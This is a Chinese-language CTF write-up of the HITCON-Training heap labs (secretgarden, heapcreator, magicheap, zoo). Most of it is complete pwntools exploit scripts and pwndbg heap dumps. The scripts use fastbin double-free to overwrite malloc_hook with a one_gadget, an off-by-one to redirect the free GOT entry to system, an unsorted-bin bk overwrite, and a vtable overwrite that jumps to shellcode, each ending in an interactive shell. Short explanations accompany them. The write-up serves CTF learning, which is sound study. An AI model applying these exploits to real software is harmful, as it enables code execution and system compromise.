r = process("./secretgarden")
def raiseFlower(size, name, color):
r.recvuntil("Your choice : ")
r.sendline("1")
r.recvuntil(":")
r.sendline(str(size))
r.recvuntil(":")
r.sendline(name)
r.recvuntil(":")
r.sendline(color)
def removeFlower(idx):
r.recvuntil("Your choice : ")
r.sendline("3")
r.recvuntil(":")
r.sendline(str(idx))
raiseFlower(0x50, "aaa", "blue")
raiseFlower(0x50, "bbb", "red")
removeFlower(0)
removeFlower(1)
removeFlower(0)
fakechunk = 0x601ffa
raiseFlower(0x50, p64(fakechunk), "red")
raiseFlower(0x50, "aaa", "blue")
raiseFlower(0x50, "bbb", "blue")
magic = 0x400c7b
payload = 'a'*6 + p64(0) + p64(magic) + p64(magic)
raiseFlower(0x50, payload, "xxx")
r.interactive()
|
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
| pwndbg> heapinfo
(0x20) fastbin[0]: 0x0
(0x30) fastbin[1]: 0x0
(0x40) fastbin[2]: 0x0
(0x50) fastbin[3]: 0x0
(0x60) fastbin[4]: 0x9e40d0 --> 0x9e4040 --> 0x601ffa (size error (0x168000000000060)) --> 0xf1000007f8c1ec3 (invaild memory)
(0x70) fastbin[5]: 0x0
(0x80) fastbin[6]: 0x0
(0x90) fastbin[7]: 0x0
(0xa0) fastbin[8]: 0x0
(0xb0) fastbin[9]: 0x0
top: 0x9e4160 (size : 0x1fea0)
last_remainder: 0x0 (size : 0x0)
unsortbin: 0x
pwndbg> x/30gx 0x601ff8
0x601ff8: 0x0000000000000000 0x0000000000601e28
0x602008: 0x00007f8c1ec30168 0x00007f8c1ea20f10
0x602018: 0x00007f8c1e6c3540 0x00007f8c1e6ae6a0
0x602028: 0x00000000004007b6 0x00007f8c1e694810
0x602038: 0x00007f8c1e7b1a30 0x00007f8c1e70b280
0x602048: 0x00007f8c1e7369a0 0x00007f8c1e736310
0x602058: 0x00007f8c1e65f750 0x00007f8c1e6743d0
0x602068: 0x00007f8c1e6c3180 0x00007f8c1e6aee80
0x602078: 0x00007f8c1e7360f0 0x00007f8c1e675e90
0x602088: 0x00007f8c1e6aa4e0 0x0000000000400886
0x602098: 0x0000000000000000 0x0000000000000000
0x6020a8: 0x0000000000000000 0x0000000000000000
0x6020b8: 0x0000000000000000 0x00007f8c1ea04620
0x6020c8 <completed>: 0x0000000300000000 0x0000000000000000
0x6020d8: 0x0000000000000000 0x00000000009e3010
pwndbg> x/30gx 0x601ffa
0x601ffa: 0x1e28000000000000 0x0168000000000060
0x60200a: 0x0f1000007f8c1ec3 0x354000007f8c1ea2
0x60201a: 0xe6a000007f8c1e6c 0x07b600007f8c1e6a
0x60202a: 0x4810000000000040 0x1a3000007f8c1e69
0x60203a: 0xb28000007f8c1e7b 0x69a000007f8c1e70
0x60204a: 0x631000007f8c1e73 0xf75000007f8c1e73
0x60205a: 0x43d000007f8c1e65 0x318000007f8c1e67
0x60206a: 0xee8000007f8c1e6c 0x60f000007f8c1e6a
0x60207a: 0x5e9000007f8c1e73 0xa4e000007f8c1e67
0x60208a: 0x088600007f8c1e6a 0x0000000000000040
0x60209a: 0x0000000000000000 0x0000000000000000
0x6020aa: 0x0000000000000000 0x0000000000000000
0x6020ba: 0x4620000000000000 0x000000007f8c1ea0
0x6020ca: 0x0000000000030000 0x0000000000000000
0x6020da: 0x3010000000000000 0x40b000000000009e
|
在0x601ffa中只会检查最后四字节,会通过大小的检查。
还可以通过UAF泄露unsortbin的地址, linux中使用free()进行内存释放时,不大于 max_fast (默认值为 64B)的 chunk 被释放后,首先会被放到 fast bins中,大于max_fast的chunk或者fast bins 中的空闲 chunk 合并后会被放入unsorted bin中(参考glibc内存管理ptmalloc源码分析一文)
而在fastbin为空时,unsortbin的fd和bk指向自身main_arena中,该地址的相对偏移值存放在libc.so中,可以通过use after free后打印出main_arena的实际地址,结合偏移值从而得到libc的加载地址。
- 首先通过unsorted_bin,free掉一个chunk,让它进入unsorted_bin表,使得fd指向表头,然后通过泄漏出的地址,通过一顿偏移的操作,泄漏出malloc_hook的地址,进而泄漏出libc的基址
- 利用double-free,使得下一个新创建的chunk会落在malloc_hook上,进而改了malloc_hook的地址,改变程序执行流程
借助one_gadget
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
| """
# one_gadget /lib/x86_64-linux-gnu/libc.so.6
0x45226 execve("/bin/sh", rsp+0x30, environ)
constraints:
rax == NULL
0x4527a execve("/bin/sh", rsp+0x30, environ)
constraints:
[rsp+0x30] == NULL
0xf0364 execve("/bin/sh", rsp+0x50, environ)
constraints:
[rsp+0x50] == NULL
0xf1207 execve("/bin/sh", rsp+0x70, environ)
constraints:
[rsp+0x70] == NULL
"""
#encoding:utf-8
from pwn import *
context(os="linux", arch="amd64",log_level = "debug")
context.terminal = ["tmux", "split", "-h"]
p = process("./secretgarden")#, aslr=0
elf = ELF("./secretgarden")
#libc = ELF("./libc-2.23.so")
libc = elf.libc
#-------------------------------------
def sl(s):
p.sendline(s)
def sd(s):
p.send(s)
def rc(timeout=0):
if timeout == 0:
return p.recv()
else:
return p.recv(timeout=timeout)
def ru(s, timeout=0):
if timeout == 0:
return p.recvuntil(s)
else:
return p.recvuntil(s, timeout=timeout)
def debug(msg=''):
gdb.attach(p,'')
pause()
def getshell():
p.interactive()
#-------------------------------------
def create(size,name,color):
ru("Your choice : ")
sl("1")
ru("Length of the name :")
sl(str(size))
ru("The name of flower :")
sd(name)
ru("The color of the flower :")
sl(color)
def visit():
ru("Your choice : ")
sl("2")
def remote(index):
ru("Your choice : ")
sl("3")
ru("Which flower do you want to remove from the garden:")
sl(str(index))
def clean():
ru("Your choice : ")
sl("4")
create(0x98,"a"*8,"1234")
create(0x68,"b"*8,"b"*8)
create(0x68,"b"*8,"b"*8)
create(0x20,"b"*8,"b"*8)
remote(0)
clean()
create(0x98,"c"*8,"c"*8)
visit()
ru("c"*8)
leak = u64(p.recv(6).ljust(8,"\x00"))
libc_base = leak -0x58-0x10 -libc.symbols["__malloc_hook"]
print "leak----->"+hex(leak)
malloc_hook = libc_base +libc.symbols["__malloc_hook"]
print "malloc_hook----->"+hex(malloc_hook)
print "libc_base----->"+hex(libc_base)
one_gadget = 0xf02a4 + libc_base
remote(1)
remote(2)
remote(1)
#debug()
create(0x68,p64(malloc_hook-0x23),"b"*4)
create(0x68,"b"*8,"b"*8)
create(0x68,"b"*8,"b"*8)
create(0x68,"a"*0x13+p64(one_gadget),"b"*4)
remote(1)
remote(1)
getshell()
|
如果由于堆栈原因one_gadget不可用:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
| #encoding:utf-8
from pwn import *
# context(os="linux", arch="amd64",log_level = "debug")
#-------------------------------------
def sl(s):
p.sendline(s)
def sd(s):
p.send(s)
def rc(timeout=0):
if timeout == 0:
return p.recv()
else:
return p.recv(timeout=timeout)
def ru(s, timeout=0):
if timeout == 0:
return p.recvuntil(s)
else:
return p.recvuntil(s, timeout=timeout)
def debug(msg=''):
gdb.attach(p,'')
pause()
def getshell():
p.interactive()
#-------------------------------------
def create(size,name,color):
ru("Your choice : ")
sl("1")
ru("Length of the name :")
sl(str(size))
ru("The name of flower :")
sd(name)
ru("The color of the flower :")
sl(color)
def visit():
ru("Your choice : ")
sl("2")
def remote(index):
ru("Your choice : ")
sl("3")
ru("Which flower do you want to remove from the garden:")
sl(str(index))
def clean():
ru("Your choice : ")
sl("4")
offset = 0
while offset < 0x20:
try:
p = process("./secretgarden")#, aslr=0
elf = ELF("./secretgarden")
#libc = ELF("./libc-2.23.so")
libc = elf.libc
create(0x98,"a"*8,"1234")
create(0x68,"b"*8,"b"*8)
create(0x68,"b"*8,"b"*8)
create(0x20,"b"*8,"b"*8)
remote(0)
clean()
create(0x98,"c"*8,"c"*8)
visit()
ru("c"*8)
leak = u64(p.recv(6).ljust(8,"\x00"))
libc_base = leak -0x58-0x10 -libc.symbols["__malloc_hook"]
print "leak----->"+hex(leak)
malloc_hook = libc_base +libc.symbols["__malloc_hook"]
realloc = libc_base + libc.symbols['__libc_realloc']
print "malloc_hook----->"+hex(malloc_hook)
print "libc_base----->"+hex(libc_base)
# 0x45226
# 0x4527a
# 0xf0364
# 0xf1207
one_gadget = 0xf1207 + libc_base
remote(1)
remote(2)
remote(1)
#debug()
create(0x68,p64(malloc_hook-0x23),"b"*4)
create(0x68,"b"*8,"b"*8)
create(0x68,"b"*8,"b"*8)
create(0x68,"a"*(0x13-0x8)+p64(one_gadget)+p64(realloc + offset),"b"*4)
ru("Your choice : ")
sl("1")
sleep(0.1)
p.interactive()
offset += 1
except:
p.close()
|
lab13
off-by-one,可以覆盖下一次chunk的size
- create两个chunk,用chunk0溢出到chunk1 的size位,然后free掉chunk1
- 申请一个新的chunk2,使得chunk2落在chunk1size的部分从而修改指针
- 改free的got表为system的地址,然后使得chunk0 的内容为/bin/sh,接着free(chunk0)从而getshell
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
| #coding=utf-8
from pwn import *
#context.log_level = "debug"
r = process("./heapcreator")
elf = ELF("./heapcreator")
libc = elf.libc
def createHeap(size, content):
r.recvuntil(":")
r.sendline("1")
r.recvuntil(":")
r.sendline(str(size))
r.recvuntil(":")
r.sendline(content)
def editHeap(idx, content):
r.recvuntil(":")
r.sendline("2")
r.recvuntil(":")
r.sendline(str(idx))
r.recvuntil(":")
r.sendline(content)
def deleteHeap(idx):
r.recvuntil(":")
r.sendline("4")
r.recvuntil(":")
r.sendline(str(idx))
def showHeap(idx):
r.recvuntil(":")
r.sendline("3")
r.recvuntil(":")
r.sendline(str(idx))
createHeap(0x18, "aaa")
createHeap(0x10, "bbb")
editHeap(0, "/bin/sh\x00" + "a"*0x10 + p64(0x41))
deleteHeap(1)
free_got = 0x602018
off_free = 0x3e3ec0
off_system = 0x453a0
createHeap(0x30, "a"*24 + p64(21) + p64(0x30) + p64(free_got))
showHeap(1)
r.recvuntil("Content : ")
free = u64(r.recv(6).ljust(8, "\x00"))
success("free address " + hex(free))
libc_base = free - libc.symbols["free"]
success("libc_base: " + hex(libc_base))
system = libc_base + libc.symbols["system"]
success("system: " + hex(system))
editHeap(1, p64(system))
deleteHeap(0)
r.interactive()
|
lab14
利用unsortbin的bk
首先,释放一个chunk到 unsorted bin 中。
接着利用堆溢出漏洞修改 unsorted bin 中对应堆块的 bk 指针为 &magic-16,再一次分配chunk的时候就会触发漏洞,会把magic的值改成一个大的数值
对于unsort bin来说,下一次malloc时会先看unsort bin中是否有适合的chunk,找不到的话才会去对应的bin中寻找,此时会顺便把unsort bin的chunk放到对应的bin中。所以无论malloc的大小(大于144),unsort bin都会有unlink操作。
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
| #coding=utf-8
from pwn import *
r = process("./magicheap")
def createHeap(size, content):
r.recvuntil(":")
r.sendline("1")
r.recvuntil(":")
r.sendline(str(size))
r.recvuntil(":")
r.sendline(content)
def editHeap(idx, size, content):
r.recvuntil(":")
r.sendline("2")
r.recvuntil(":")
r.sendline(str(idx))
r.recvuntil(":")
r.sendline(str(size))
r.recvuntil(":")
r.sendline(content)
def delete(idx):
r.recvuntil(":")
r.sendline("3")
r.recvuntil(":")
r.sendline(str(idx))
createHeap(0x30, "aaa")
createHeap(0x80, "bbb")
createHeap(0x30, "ccc")
delete(1)
magic = 0x6020C0
editHeap(0, 0x100, "a"*0x30 + p64(0) + p64(0x91) + p64(0) + p64(magic - 0x10))
createHeap(0x80, "bbb")
r.interactive()
|
lab15
animallist中存储的数据结构:
1
2
3
4
5
| struct{
void *animal_vptr;
char name[24];
int weight;
}
|
在Dog的构造函数中存在overflow,可以覆盖虚表指针
- 首先new 两个dog,然后earse 0, 再次new,这样会把之前earse的空间分配给这一次。利用overflow可以覆盖上一个的虚表指针。
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
| #encoding:utf-8
from pwn import *
context(os="linux", arch="amd64",log_level = "debug")
p = process("./zoo")#, aslr=0
elf = ELF("./zoo")
libc = elf.libc
#-------------------------------------
def sl(s):
p.sendline(s)
def sd(s):
p.send(s)
def rc(timeout=0):
if timeout == 0:
return p.recv()
else:
return p.recv(timeout=timeout)
def ru(s, timeout=0):
if timeout == 0:
return p.recvuntil(s)
else:
return p.recvuntil(s, timeout=timeout)
def debug(msg=''):
gdb.attach(p,'')
pause()
def getshell():
p.interactive()
#-------------------------------------
shellcode = asm(shellcraft.sh())
def add_dog(name,weight):
ru(":")
sl("1")
ru(":")
sl(name)
ru(":")
sl(str(weight))
def remove(idx):
ru(":")
sl("5")
ru(":")
sl(str(idx))
def listen(idx):
ru(":")
sl("3")
ru(":")
sl(str(idx))
#gdb.attach(p,"b *0x40193E\nc\n")
nameofzoo = 0x605420
ru(":")
sl(shellcode + p64(nameofzoo))
add_dog("a"*8,0)
add_dog("b"*8,1)
remove(0)
fake_vptr = nameofzoo + len(shellcode)
add_dog("c"*72 + p64(fake_vptr),2)
#pause()
listen(0)
getshell()
|
参考链接
https://xz.aliyun.com/t/3902
https://www.sec4.fun/2020/07/15/hitcon-training-writeup
https://www.anquanke.com/post/id/186447
https://introspelliam.github.io/2017/08/07/int-80h%E7%B3%BB%E7%BB%9F%E8%B0%83%E7%94%A8%E6%96%B9%E6%B3%95/
